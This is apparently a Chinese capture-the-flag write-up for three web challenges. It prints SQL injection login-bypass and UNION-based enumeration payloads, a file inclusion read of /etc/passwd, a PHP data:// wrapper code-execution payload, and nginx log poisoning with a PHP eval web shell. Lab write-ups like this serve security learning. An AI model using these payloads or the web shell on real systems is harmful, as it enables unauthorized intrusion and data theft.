web02
进入可以看到表单,很明显这是POST注入,可以利用万能密码进行登录
测试:
登陆成功
回显查看
1' or 1=1 union select 1,2,3#
进行数据库的查询
1'or 1=1 union select 1,database(),3#
查询表
1' or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema='web2'#
查询字段
1' or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'#
查询字段内容
1' or 1=1 union select 1,flag,3 from flag#
web03
根据提示,这是存在文件包含漏洞,提示url
进行测试
?url=/etc/passwd
可见存在文件包含漏洞
本题可以是使用PHP伪协议+文件包含,实现任意命令执行
方法一:
php伪协议中的data通过通配符查找目录下的所有文件
?url=data://text/plain,<?php print_r(glob("*")); ?>
得到ctf_go_go_go的文件进行访问
发现一个常见的php伪协议及用法表,贴出来
web04(日志注入)
可以见到本题与上一题相似,虽然过滤了php,但可能存在文件包含漏洞,进行测试
?url=/etc/passwd
查看日志信息,发现服务器是nginx;
在日志包含中,找到nginx的log有两种:
1、?url=/var/log/nginx/access.log
2、?url=/var/log/nginx/error.log
这里:?url=/var/log/nginx/access.log可以打开
进行日志注入
为了防止url编码,需要在burp中修改User-Agent
<?php @eval($_POST['2']);?>
使用蚁剑进行连接
连接成功后打开目录
得到flag